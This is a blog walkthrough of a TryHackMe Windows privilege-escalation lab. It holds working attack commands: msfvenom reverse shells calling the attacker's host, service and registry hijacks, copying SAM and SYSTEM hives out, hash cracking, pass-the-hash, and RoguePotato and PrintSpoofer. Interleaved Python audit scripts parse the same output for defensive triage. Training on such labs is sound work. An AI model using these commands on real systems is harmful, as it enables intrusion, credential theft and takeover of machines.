Windows PrivEsc

Feras Kanaan (0xFK)
12 min read · Oct 20, 2021

Another interesting walkthrough of a variety of Windows Privilege Escalation techniques, compiled by TryHackMe.

This VM was created by Sagi Shahar as part of his local privilege escalation workshop but has been updated by Tib3rius as part of his Windows Privilege Escalation for OSCP and Beyond! course on Udemy.


Task 2 Generate a Reverse Shell Executable

$ xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.22.168

Generate the reverse shell payload:

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.0.108 LPORT=53 -f exe -o reverse.exe

Transfer the file using an SMB server:

└─# sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Copy the payload to the Windows machine:

copy \\10.9.0.108\kali\reverse.exe C:\PrivEsc\reverse.exe

Run a listener on Kali, then execute the payload on Windows:

C:\PrivEsc\reverse.exe

We catch the shell:

└─$ sudo nc -nvlp 53 
listening on [any] 53 ...
connect to [10.9.0.108] from (UNKNOWN) [10.10.22.168] 49926
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\user>

Task 3 Service Exploits — Insecure Service Permissions

Use accesschk.exe to check the “user” account’s permissions on the “daclsvc” service:

C:\Users\user>C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc

Query the service and note that it runs with SYSTEM privileges (SERVICE_START_NAME):

sc qc daclsvc

Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable you created:

sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:

C:\Users\user>net start daclsvc

We get a reverse shell by exploiting the service. For reference, the original service binary (as shown by sc qc) was:

C:\Program Files\DACL Service\daclservice.exe

Task 4 Service Exploits — Unquoted Service Path

# Query the "unquotedsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) and that the BINARY_PATH_NAME is unquoted and contains spaces.

C:\Users\user>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

# Using accesschk.exe, note that the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory:
C:\Users\user>C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators

# Copy the reverse.exe executable you created to this directory and rename it Common.exe:
C:\Users\user>copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
1 file(s) copied.
# Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
C:\Users\user>net start unquotedsvc

C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
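To make the unquoted-path check repeatable, here is an added Python example (not part of the room or this write-up) that parses sc qc output, decides whether the path is unquoted and contains spaces, lists the paths Windows probes in order (which is why a file named Common.exe in the writable directory gets picked up), and derives the directories whose ACLs need checking. The sc qc text is a constructed sample with the same fields as the unquotedsvc output above.

```python
import re
import ntpath

# Constructed sample in the shape of `sc qc <service>` output (same fields as the
# unquotedsvc output in the walkthrough).
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")
# Accounts that mean "the service runs as SYSTEM" (compared case-insensitively).
SYSTEM_ACCOUNTS = {"localsystem", r"nt authority\system"}


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD -> value."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def is_unquoted_with_spaces(binary_path):
    """The dangerous combination: no surrounding quotes and at least one space."""
    path = binary_path.strip()
    return not path.startswith('"') and " " in path


def hijack_candidates(binary_path):
    """Paths that CreateProcess probes, in order, for an unquoted path with spaces:
    each space-delimited prefix (with ".exe" appended when the prefix has no
    extension), ending with the full string. Arguments after the executable are not
    separated out; sc qc shows them inside BINARY_PATH_NAME."""
    words = binary_path.strip().split(" ")
    candidates = []
    for i in range(1, len(words) + 1):
        prefix = " ".join(words[:i])
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def audit_service(sc_qc_text):
    """Report whether the service runs as SYSTEM with an unquoted, space-containing
    path, and which directories' ACLs must be checked for low-privileged write access."""
    f = parse_sc_qc(sc_qc_text)
    path = f.get("BINARY_PATH_NAME", "")
    unquoted = is_unquoted_with_spaces(path)
    candidates = hijack_candidates(path) if unquoted else []
    dirs = []
    for c in candidates:
        d = ntpath.dirname(c)
        if d not in dirs:
            dirs.append(d)
    return {
        "service": f.get("SERVICE_NAME"),
        "runs_as_system": f.get("SERVICE_START_NAME", "").lower() in SYSTEM_ACCOUNTS,
        "unquoted_path_with_spaces": unquoted,
        "probe_order": candidates,
        "directories_to_check": dirs,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(audit_service(SC_QC_OUTPUT), indent=2))
```

Run it directly to print the report as JSON; on a real host, feed it the output of sc qc for each service. Any directory in directories_to_check that grants write access to a low-privileged group (as accesschk showed for BUILTIN\Users above) is the finding to fix, either by quoting the path in the service configuration or by tightening the directory ACL.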

Task 5 Service Exploits — Weak Registry Permissions

Query the “regsvc” service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).

sc qc regsvc

Using accesschk.exe, note that the registry entry for the regsvc service is writable by the “NT AUTHORITY\INTERACTIVE” group (essentially all logged-on users):

C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

Overwrite the ImagePath registry key to point to the reverse.exe executable you created:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:

net start regsvc

Task 6 Service Exploits — Insecure Service Executables

Query the “filepermsvc” service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).

sc qc filepermsvc

Using accesschk.exe, note that the service binary (BINARY_PATH_NAME) file is writable by everyone:

C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

Copy the reverse.exe executable you created and replace the filepermservice.exe with it:

copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:

net start filepermsvc

Task 7 Registry — AutoRuns

Query the registry for AutoRun executables:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Using accesschk.exe, note that one of the AutoRun executables is writable by everyone:

C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

Copy the reverse.exe executable you created and overwrite the AutoRun executable with it:

copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

Start a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges. You should not have to authenticate to trigger it, however if the payload does not fire, log in as an admin (admin/password123) to trigger it. Note that in a real world engagement, you would have to wait for an administrator to log in themselves!

└─$ xfreerdp /u:admin /p:password123 /cert:ignore /v:10.10.138.203

Task 8 Registry — AlwaysInstallElevated

Query the registry for AlwaysInstallElevated keys:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Both keys are set to 1 (0x1), so any MSI package is installed elevated, as SYSTEM.

Generate a reverse shell Windows Installer (reverse.msi) using msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msi

Transfer the reverse.msi file to the C:\PrivEsc directory on Windows (use the SMB server method from earlier).

C:\Users\user>copy \\10.9.0.108\kali\reverse.msi C:\PrivEsc\reverse.msi
1 file(s) copied.

Start a listener on Kali and then run the installer to trigger a reverse shell running with SYSTEM privileges:

msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
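The two reg query checks above (the AutoRun entries in Task 7 and the AlwaysInstallElevated values in Task 8) are easy to script. The following added Python example (not from the room or this write-up) parses reg query output into a dictionary, evaluates the AlwaysInstallElevated policy the way Windows does (it only applies when BOTH the HKLM and the HKCU value are 1), and lists the executables launched from Run keys so their file ACLs can be checked. The reg query text is a constructed sample; the SecurityHealth entry and the WIN-style paths are made up for the example.

```python
import re

# Constructed sample in the shape of `reg query` output: a Run key (Task 7) and the two
# AlwaysInstallElevated policy values (Task 8). Name/type/data are separated by 4 spaces.
REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    My Program    REG_SZ    "C:\Program Files\Autorun Program\program.exe"

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

KEY_RE = re.compile(r"^(HKEY_[A-Z_]+\\.*?)\s*$")
VALUE_RE = re.compile(r"^\s+(.+?)\s{2,}(REG_[A-Z_]+)(?:\s{2,}(.*?))?\s*$")

INSTALLER_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer",
    r"HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer",
)


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}}."""
    reg = {}
    current = None
    for line in text.splitlines():
        k = KEY_RE.match(line)
        if k:
            current = k.group(1)
            reg.setdefault(current, {})
            continue
        v = VALUE_RE.match(line)
        if v and current is not None:
            name, vtype, data = v.group(1), v.group(2), v.group(3) or ""
            reg[current][name] = (vtype, data)
    return reg


def always_install_elevated(reg):
    """The policy only takes effect when both the machine and the user value are 1."""
    for key in INSTALLER_KEYS:
        entry = reg.get(key, {}).get("AlwaysInstallElevated")
        if entry is None:
            return False
        _vtype, data = entry
        if int(data, 0) != 1:      # reg query prints DWORDs as 0x1 / 0x0
            return False
    return True


def executable_from_command(data):
    """Pull the program path out of a Run value's command line."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    if data.lower().endswith(".exe"):
        return data
    return data.split(" ")[0]


def autorun_binaries(reg):
    """Executables launched from Run keys; each one is a candidate for an ACL check."""
    paths = []
    for key, values in reg.items():
        if not key.upper().endswith(r"\CURRENTVERSION\RUN"):
            continue
        for _name, (_vtype, data) in values.items():
            paths.append(executable_from_command(data))
    return paths


if __name__ == "__main__":
    reg = parse_reg_query(REG_QUERY_OUTPUT)
    print("AlwaysInstallElevated effective:", always_install_elevated(reg))
    for p in autorun_binaries(reg):
        print("AutoRun executable to check:", p)
```

On a real host, pipe the output of the reg query commands from Tasks 7 and 8 into parse_reg_query. The fix for the installer finding is to set both AlwaysInstallElevated values to 0 (or remove them); for AutoRun entries, every path returned by autorun_binaries should be writable only by administrators.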

Task 9 Passwords — Registry

Search the registry for the word “password”:

reg query HKLM /f password /t REG_SZ /s

Or, a faster way:

C:\Users\user>C:\PrivEsc\winPEASany.exe password fast

Get the user name from the Winlogon registry key:

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

Check whether the shell is elevated (S-1-16-12288 is the High Mandatory Level SID):

C:\Windows\system32>whoami /groups | find "S-1-16-12288"

On Kali, use the winexe command to spawn a command prompt running with the admin privileges (update the password with the one you found):

─$ winexe -U 'admin%password123' //10.10.138.203 cmd.exe

Task 10 Passwords — Saved Creds

List any saved credentials:

cmdkey /list

The credentials for the “admin” user are saved. Start a listener on Kali and run the reverse.exe executable using runas with the admin user’s saved credentials:

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Task 11 Passwords — Security Account Manager (SAM)

The SAM and SYSTEM files can be used to extract user password hashes. This VM has insecurely stored backups of the SAM and SYSTEM files in the C:\Windows\Repair\ directory.

Transfer the SAM and SYSTEM files to your Kali VM:

C:\Users\user>copy C:\Windows\Repair\SAM \\10.9.0.108\kali\
1 file(s) copied.
C:\Users\user>copy C:\Windows\Repair\SYSTEM \\10.9.0.108\kali\
1 file(s) copied.

On Kali, clone the creddump7 repository (the one on Kali is outdated and will not dump hashes correctly for Windows 10!) and use it to dump out the hashes from the SAM and SYSTEM files:

git clone https://github.com/Tib3rius/creddump7
pip3 install pycrypto
python3 creddump7/pwdump.py SYSTEM SAM
# Works better inside a pipenv virtualenv:
─$ pipenv install pycrypto
Creating a virtualenv for this project...
Pipfile: /home/kali/Documents/Privesc/Windows/creddump/Pipfile
Using /usr/bin/python3 (3.9.2) to create virtualenv...
⠏ Creating virtual environment...created virtual environment CPython3.9.2.final.0-64 in 605ms
creator CPython3Posix(dest=/home/kali/.local/share/virtualenvs/creddump-zrhnRO7r, clear=False, no_vcs_ignore=False, global=False)
seeder FromAppData(download=False, pip=bundle, setuptools=bundle, wheel=bundle, via=copy, app_data_dir=/home/kali/.local/share/virtualenv)
added seed packages: pip==21.2.4, setuptools==58.0.4, wheel==0.37.0
activators BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator,PythonActivator

✔ Successfully created virtual environment!
Virtualenv location: /home/kali/.local/share/virtualenvs/creddump-zrhnRO7r
Creating a Pipfile for this project...
Installing pycrypto...
Adding pycrypto to Pipfile's [packages]...
✔ Installation Succeeded
Pipfile.lock not found, creating...
Locking [dev-packages] dependencies...
Locking [packages] dependencies...
Building requirements...
Resolving dependencies...
✔ Success!
Updated Pipfile.lock (3ba98a)!
Installing dependencies from Pipfile.lock (3ba98a)...
🐍 ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ 0/0 — 00:00:00
To activate this project's virtualenv, run pipenv shell.
Alternatively, run a command inside the virtualenv with pipenv run.

┌──(kali㉿kali)-[~/Documents/Privesc/Windows/creddump]
└─$ git clone https://github.com/Tib3rius/creddump7
Cloning into 'creddump7'...
remote: Enumerating objects: 107, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 107 (delta 0), reused 1 (delta 0), pack-reused 102
Receiving objects: 100% (107/107), 51.65 KiB | 777.00 KiB/s, done.
Resolving deltas: 100% (55/55), done.

┌──(kali㉿kali)-[~/Documents/Privesc/Windows/creddump]
└─$ ls
creddump7 Pipfile Pipfile.lock
─$ pipenv run python3 creddump7/pwdump.py SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::# <--- NTLM hash to crack

Crack the admin NTLM hash using hashcat:

hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da /usr/share/wordlists/rockyou.txt

You can use the cracked password to log in as the admin using winexe or RDP.

a9fdfa038c4b75ebc76dc855dd74f0da
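As an added example (not from the room or this write-up), the following Python triages pwdump-style output in the user:RID:LM:NT::: format shown above: it flags accounts whose NT hash is the hash of an empty password, accounts that still store an LM hash, and NT hashes shared by several accounts (password reuse). The two constants are the well-known empty LM hash (aad3b435...) and empty-password NT hash (31d6cfe0...); the input is the hash list above, copied from the walkthrough.

```python
# The LM field holds this value when no LM hash is stored (the default on modern Windows).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# The NT hash of an empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Input copied from the walkthrough's pwdump.py output (trailing comment included on purpose).
PWDUMP_OUTPUT = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::# <--- NTLM hash to crack
"""


def parse_pwdump(text):
    """Parse user:rid:lmhash:nthash::: lines into dicts; '#' comments are ignored."""
    accounts = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        accounts.append({
            "user": parts[0],
            "rid": int(parts[1]),
            "lm": parts[2].lower(),
            "nt": parts[3].lower(),
        })
    return accounts


def triage(accounts):
    """Findings a defender cares about when reviewing a SAM dump."""
    findings = {"empty_password": [], "lm_hash_stored": [], "shared_nt_hash": {}}
    by_nt = {}
    for a in accounts:
        if a["nt"] == EMPTY_NT:
            findings["empty_password"].append(a["user"])
        if a["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(a["user"])
        by_nt.setdefault(a["nt"], []).append(a["user"])
    for nt, users in by_nt.items():
        # Identical non-empty NT hashes mean the same password on several accounts.
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_nt_hash"][nt] = users
    return findings


def nt_hash_for_user(accounts, user):
    """The NT hash is the value hashcat mode 1000 takes as input."""
    for a in accounts:
        if a["user"].lower() == user.lower():
            return a["nt"]
    return None


if __name__ == "__main__":
    accounts = parse_pwdump(PWDUMP_OUTPUT)
    for name, value in triage(accounts).items():
        print(f"{name}: {value}")
```

In this dump, Guest and DefaultAccount carry the empty-password NT hash (both are disabled by default, but the check is worth running on every dump), no account stores an LM hash, and no password is shared between accounts.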

Task 12 Passwords — Passing the Hash

Alternatively, use the full admin hash with pth-winexe to spawn a shell running as admin without cracking the password. Remember that the complete hash includes both the LM and the NTLM hash, separated by a colon:

─$ pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //10.10.133.17 cmd.exe

Task 13 Scheduled Tasks

type C:\DevTools\CleanUp.ps1

The script is self-describing. Using accesschk.exe, note that the “user” account is able to write to this file:

C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1

Start a listener on Kali and then append a line to the C:\DevTools\CleanUp.ps1 which runs the reverse.exe executable you created:

C:\Users\user>echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Wait for the Scheduled Task to run, which should trigger the reverse shell as SYSTEM.

Task 14 Insecure GUI Apps

Start an RDP session as the “user” account:

rdesktop -u user -p password321 10.10.133.17

Double-click the “AdminPaint” shortcut on your Desktop. Once it is running, open a command prompt and note that Paint is running with admin privileges:

tasklist /V | findstr mspaint.exe

In Paint, click “File” and then “Open”. In the open file dialog box, click in the navigation input and paste: file://c:/windows/system32/cmd.exe

Press Enter to spawn a command prompt running with admin privileges.

Task 15 Startup Apps

Using accesschk.exe, note that the BUILTIN\Users group can write files to the StartUp directory:

C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Using cscript, run the C:\PrivEsc\CreateShortcut.vbs script which should create a new shortcut to your reverse.exe executable in the StartUp directory:

cscript C:\PrivEsc\CreateShortcut.vbs

Or using PowerShell:

PS C:\Users\user> $s=(New-Object -COM WScript.Shell).CreateShortcut('C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk');
PS C:\Users\user> $s.TargetPath='C:\PrivEsc\reverse.exe'
PS C:\Users\user> $s.Save()

Start a listener on Kali, and then simulate an admin logon using RDP and the credentials you previously extracted:

─$ xfreerdp /u:admin /p:password123 /cert:ignore /v:10.10.133.17

A shell running as admin should connect back to your listener.
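Every task so far that relies on a weak ACL (the service in Task 3, the directory in Task 4, the registry key in Task 5, the binaries in Tasks 6 and 7, the script in Task 13 and the StartUp folder here) is found with accesschk. The following added Python example (not from the room or this write-up) parses accesschk's non-verbose and verbose output and reports any principal outside a small trusted set that holds write access, calling out service rights such as SERVICE_CHANGE_CONFIG that allow the binary path to be changed. The input combines the directory listing from Task 4 with a constructed service block; the hostname WIN-HOST and the exact rights list are made up for the example.

```python
import re

# Principals that are expected to have write access; anything else with W is reported.
TRUSTED_PRINCIPALS = {
    r"NT AUTHORITY\SYSTEM",
    r"BUILTIN\Administrators",
    r"NT SERVICE\TrustedInstaller",
}
# Service rights that let the holder change what the service runs or take it over.
DANGEROUS_SERVICE_RIGHTS = {"SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER"}

# Sample accesschk output: the directory block is from the walkthrough (Task 4); the
# daclsvc block with its verbose rights list is constructed (hostname WIN-HOST is made up).
ACCESSCHK_OUTPUT = r"""
C:\Program Files\Unquoted Path Service
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
daclsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW WIN-HOST\user
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL
"""

PERM_RE = re.compile(r"^\s*(RW|R|W)\s+(\S.*?)\s*$")   # "RW BUILTIN\Users"
RIGHT_RE = re.compile(r"^\s+([A-Z_]+)\s*$")           # indented right name in -v output


def parse_accesschk(text):
    """Return {object: [{"principal", "access", "rights"}, ...]} in output order."""
    objects = {}
    current = None
    last_entry = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip():
            continue
        m = PERM_RE.match(line)
        if m and current is not None:
            last_entry = {"principal": m.group(2), "access": m.group(1), "rights": []}
            objects[current].append(last_entry)
            continue
        if "Mandatory Level" in line:
            continue
        r = RIGHT_RE.match(line)
        if r and last_entry is not None:
            last_entry["rights"].append(r.group(1))
            continue
        # Anything else at the start of a line is the next object (file, directory,
        # service or registry key) that accesschk reported on.
        current = line.strip()
        objects[current] = []
        last_entry = None
    return objects


def find_weak_acls(objects):
    """Write access held by a principal that is not in the trusted set."""
    findings = []
    for obj, entries in objects.items():
        for e in entries:
            if e["principal"] in TRUSTED_PRINCIPALS or "W" not in e["access"]:
                continue
            findings.append({
                "object": obj,
                "principal": e["principal"],
                "access": e["access"],
                "dangerous_rights": sorted(set(e["rights"]) & DANGEROUS_SERVICE_RIGHTS),
            })
    return findings


if __name__ == "__main__":
    for f in find_weak_acls(parse_accesschk(ACCESSCHK_OUTPUT)):
        print(f"{f['object']}: {f['principal']} has {f['access']} {f['dangerous_rights']}")
```

The deny-by-default choice (report everyone except SYSTEM, Administrators and TrustedInstaller) is deliberate: it catches BUILTIN\Users, Everyone, Authenticated Users, INTERACTIVE and individual local accounts alike. Feed it the output of accesschk -uwqv (or -uwcqv for services, -uwkqv for registry keys) over the objects a SYSTEM service or scheduled task depends on.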

Task 16 Token Impersonation — Rogue Potato

copy \\10.9.0.108\kali\reverse.exe C:\PrivEsc\reverse.exe

There are two types of tokens:

1: Delegate

2: Impersonate

Delegate: Delegate tokens are created for ‘interactive’ logons, such as logging into the machine or connecting to it via Remote Desktop.

Impersonate: Impersonate tokens are for ‘non-interactive’ sessions, such as attaching a network drive or a domain logon script.

Set up a socat redirector on Kali, forwarding Kali port 135 to port 9999 on Windows:

sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.126.172:9999

Start a listener on Kali. Simulate getting a service account shell by logging into RDP as the admin user, starting an elevated command prompt (right-click -> run as administrator) and using PSExec64.exe to trigger the reverse.exe executable you created with the permissions of the “local service” account:

Generate two different reverse shells:

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.0.212 LPORT=53 -f exe -o reverse.exe
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.0.212 LPORT=909 -f exe -o reverse909.exe

Copy both to the Windows victim machine:

C:\Windows\system32>copy \\10.9.0.212\kali\reverse.exe C:\PrivEsc\reverse.exe # 53 reverse
C:\Windows\system32>copy \\10.9.0.212\kali\reverse909.exe C:\PrivEsc\reverse909.exe # 909 reverse

Run the port-53 payload to get a shell as the local service account:

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe

After receiving the shell on port 53, run RoguePotato from inside that “local service” reverse shell (-r should reference the Kali machine, and -l 9999 must match the port used in socat).

Run RoguePotato to escalate from local service to SYSTEM:

C:\Windows\system32>C:\PrivEsc\RoguePotato.exe -r 10.9.0.212 -e "C:\PrivEsc\rev909.exe" -l 9999

Receive the SYSTEM shell on the second listener (909).

Task 17 Token Impersonation — PrintSpoofer

In Windows, open cmd as Administrator and copy the port-53 and port-909 reverse shell executables over.

Run the port-53 listener:

└─$ sudo nc -nvlp 53 
listening on [any] 53 ...

Run the port-53 reverse shell executable; if everything is correct we should get a reverse shell:

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\rev53.exe

Start another listener on Kali for port 909. Now, in the “local service” reverse shell (53), run the PrintSpoofer exploit to trigger the port-909 reverse shell running with SYSTEM privileges. We should then receive the reverse shell on 909 with SYSTEM privileges.

Task 18 Privilege Escalation Scripts

PowerUp.ps1

PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. See README.md for more information.

# One line
C:\Users\admin> powershell -nop -exec bypass -c "Import-Module C:\PrivEsc\PowerUp.ps1; Invoke-AllChecks"


# Multiple lines

C:\Users\admin>powershell -nop -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\admin> Import-Module C:\PrivEsc\PowerUp.ps1
PS C:\Users\admin> Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
PS C:\Users\admin> type .\checks.txt

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...
[+] User is in a local group that grants administrative privileges!
[+] Run a BypassUAC attack to elevate privileges to admin.

SharpUp.exe

C:\Users\admin>c:\PrivEsc\SharpUp.exe audit

=== SharpUp: Running Privilege Escalation Checks ===
[*] In medium integrity but user is a local administrator- UAC can be bypassed.
[*] Audit mode: running all checks anyway.
=== Modifiable Services ===
Name : daclsvc
DisplayName : DACL Service
Description :
State : Stopped
StartMode : Manual
PathName : "C:\Program Files\DACL Service\daclservice.exe"
=== Modifiable Service Binaries ===
Name : filepermsvc
DisplayName : File Permissions Service
Description :
State : Stopped
StartMode : Manual
PathName : "C:\Program Files\File Permissions Service\filepermservice.exe"
=== AlwaysInstallElevated Registry Keys ===
HKLM: 1
=== Modifiable Folders in %PATH% ===
Modifable %PATH% Folder : C:\Temp
=== Modifiable Registry Autoruns ===
HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run : C:\Program Files\Autorun Program\program.exe
=== *Special* User Privileges ===
=== Unattended Install Files ===
C:\Windows\Panther\Unattend.xml
=== McAfee Sitelist.xml Files ===
=== Cached GPP Password ===
[X] Exception: Could not find a part of the path 'C:\ProgramData\Microsoft\Group Policy\History'.
[*] Completed Privesc Checks in 0 seconds

Most of these scripts automate the same techniques covered in the tasks above.
